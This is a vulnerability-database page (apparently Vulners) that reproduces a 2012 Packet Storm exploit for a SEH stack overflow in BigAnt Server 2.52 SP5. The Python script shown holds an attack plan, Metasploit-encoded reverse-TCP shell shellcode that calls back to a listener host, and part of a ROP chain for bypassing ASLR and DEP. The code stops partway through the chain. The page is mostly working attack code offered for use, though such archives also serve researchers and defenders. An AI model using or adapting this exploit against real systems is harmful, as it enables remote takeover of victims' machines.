Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

BigAnt Server 2.52 Stack Overflow

🗓️ 05 Nov 2012 00:00:00Reported by Lorenzo CantoniType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 23 Views

Exploit for BigAnt Server 2.52 SP5 SEH Stack Overflow ROP-based bypassing ASLR and DEP on Windows 7 SP0 x86 Italia

Code
`# Exploit Title: BigAnt Server 2.52 SP5 SEH Stack Overflow ROP-based exploit (ASLR + DEP bypass)  
# Date: 03/11/2012  
# Exploit Author: Lorenzo Cantoni  
# Vendor Homepage: http://www.bigantsoft.com/  
# Version: BigAnt Console 2.52 SP5  
# Tested on: Windows 7 SP0 x86 Italian - expsrv.dll (6.0.9589)  
# Info: Vulnerability discovered by Lincoln: http://www.securityfocus.com/bid/37520/info  
  
  
import socket  
import sys  
  
################  
#Attack plan  
#1) Overwrite SEH handler with a ROP Gadget that will move the stack pointer inside our buffer and continue the execution from there (ADD ESP,something + RETN should be ok)  
#2) Execute the ROP Chain for a VirtualAlloc() and PUSHAD  
#3) Run the shellcode  
#4) Have fun :)  
################  
  
  
# Memory Layout  
  
################  
#  
# Padding  
#  
################  
#  
# ROP-NOP Sled  
#  
################  
#  
# ROP Chain  
#  
################  
#  
# Padding  
#  
################  
#  
# NOP SLED  
#  
################  
#  
# Shellcode  
#  
################  
#  
# Padding  
#  
################  
#  
# SEH Overwite (Stack Pivot)  
#  
################  
#  
# Padding (may be useful for other shellcode?)  
#  
################  
  
  
  
#From the original exploit, SEH will be overwritten after 966 bytes  
  
target_address=sys.argv[1]  
target_port=6660  
  
#./msfpayload windows/shell/reverse_tcp EXITFUNC=thread LHOST=192.168.1.5 LPORT=4444 R | ./msfencode -a x86 -b "\x00\x0a\x0d\x20\x25" -t c  
# size 317  
shellcode = ("\xb8\xc0\xd7\xb6\x97\xdb\xd2\xd9\x74\x24\xf4\x5d\x29\xc9\xb1"  
"\x49\x31\x45\x14\x03\x45\x14\x83\xc5\x04\x22\x22\x4a\x7f\x2b"  
"\xcd\xb3\x80\x4b\x47\x56\xb1\x59\x33\x12\xe0\x6d\x37\x76\x09"  
"\x06\x15\x63\x9a\x6a\xb2\x84\x2b\xc0\xe4\xab\xac\xe5\x28\x67"  
"\x6e\x64\xd5\x7a\xa3\x46\xe4\xb4\xb6\x87\x21\xa8\x39\xd5\xfa"  
"\xa6\xe8\xc9\x8f\xfb\x30\xe8\x5f\x70\x08\x92\xda\x47\xfd\x28"  
"\xe4\x97\xae\x27\xae\x0f\xc4\x6f\x0f\x31\x09\x6c\x73\x78\x26"  
"\x46\x07\x7b\xee\x97\xe8\x4d\xce\x7b\xd7\x61\xc3\x82\x1f\x45"  
"\x3c\xf1\x6b\xb5\xc1\x01\xa8\xc7\x1d\x84\x2d\x6f\xd5\x3e\x96"  
"\x91\x3a\xd8\x5d\x9d\xf7\xaf\x3a\x82\x06\x7c\x31\xbe\x83\x83"  
"\x96\x36\xd7\xa7\x32\x12\x83\xc6\x63\xfe\x62\xf7\x74\xa6\xdb"  
"\x5d\xfe\x45\x0f\xe7\x5d\x02\xfc\xd5\x5d\xd2\x6a\x6e\x2d\xe0"  
"\x35\xc4\xb9\x48\xbd\xc2\x3e\xae\x94\xb2\xd1\x51\x17\xc2\xf8"  
"\x95\x43\x92\x92\x3c\xec\x79\x63\xc0\x39\x2d\x33\x6e\x92\x8d"  
"\xe3\xce\x42\x65\xee\xc0\xbd\x95\x11\x0b\xd6\x3f\xeb\xdc\x19"  
"\x17\xf2\x19\xf2\x65\xf5\x30\x5e\xe0\x13\x58\x4e\xa4\x8c\xf5"  
"\xf7\xed\x47\x67\xf7\x38\x22\xa7\x73\xce\xd2\x66\x74\xbb\xc0"  
"\x1f\x74\xf6\xbb\xb6\x8b\x2d\xd1\x36\x1e\xc9\x70\x60\xb6\xd3"  
"\xa5\x46\x19\x2c\x80\xdc\x90\xb8\x6b\x8b\xdc\x2c\x6c\x4b\x8b"  
"\x26\x6c\x23\x6b\x12\x3f\x56\x74\x8f\x53\xcb\xe1\x2f\x02\xbf"  
"\xa2\x47\xa8\xe6\x85\xc8\x53\xcd\x17\x35\x82\x28\x92\x4f\xa0"  
"\x58\x5e")  
  
  
# ROP Chain target  
#  
# EAX = NOP (0x90909090)  
# ECX = flProtect (0x40)  
# EDX = flAllocationType (0x1000)  
# EBX = dwSize (0x1)  
# ESP = lpAddress (automatic)  
# EBP = ReturnTo (ptr to jmp esp)  
# ESI = ptr to VirtualAlloc()  
# EDI = ROP NOP (RETN)  
  
# we will ROP inside VBAJET32.DLL which is proprietary and an OS DLL, C:\Windows\system32\expsrv.dll  
  
  
# ADJUST EDX AND EDI  
ropchain = ''  
for i in range(0,16): ropchain = ropchain + '\xc5\x86\x9e\x0f' #ADD EAX 100 - RETN # REPEAT 16 TIMES  
ropchain = ropchain + '\x3c\xe4\x9e\x0f' # The next gadget point to the following  
#0F9EE43C 8BD0 MOV EDX,EAX  
#0F9EE43E 8D41 08 LEA EAX,DWORD PTR DS:[ECX+8]  
#0F9EE441 C1E0 04 SHL EAX,4  
#0F9EE444 2BC2 SUB EAX,EDX  
#0F9EE446 5F POP EDI  
#0F9EE447 5E POP ESI  
#0F9EE448 5D POP EBP  
#0F9EE449 5B POP EBX  
#0F9EE44A C3 RETN  
  
# According to my registers values, at pivoting time ECX+8 should point to a valid memory location so we go on  
  
ropchain = ropchain + '\x9f\x18\x9a\x0f' # RETN POPPED IN EDI (ROP-NOP)  
ropchain = ropchain + '\x41\x41\x41\x41' # compensation for POP ESI  
ropchain = ropchain + '\x41\x41\x41\x41' # compensation for POP EBP  
ropchain = ropchain + '\xff\xff\xff\xff' # will be popped in EBX (and incremented later)  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
05 Nov 2012 00:00Current
0.6Low risk
Vulners AI Score0.6
bigant server 2.52stack overflowrop-basedaslr bypassdep bypasswindows 7italiansecurityfocusvulnerabilityrop gadgetvirtualallocshellcode
23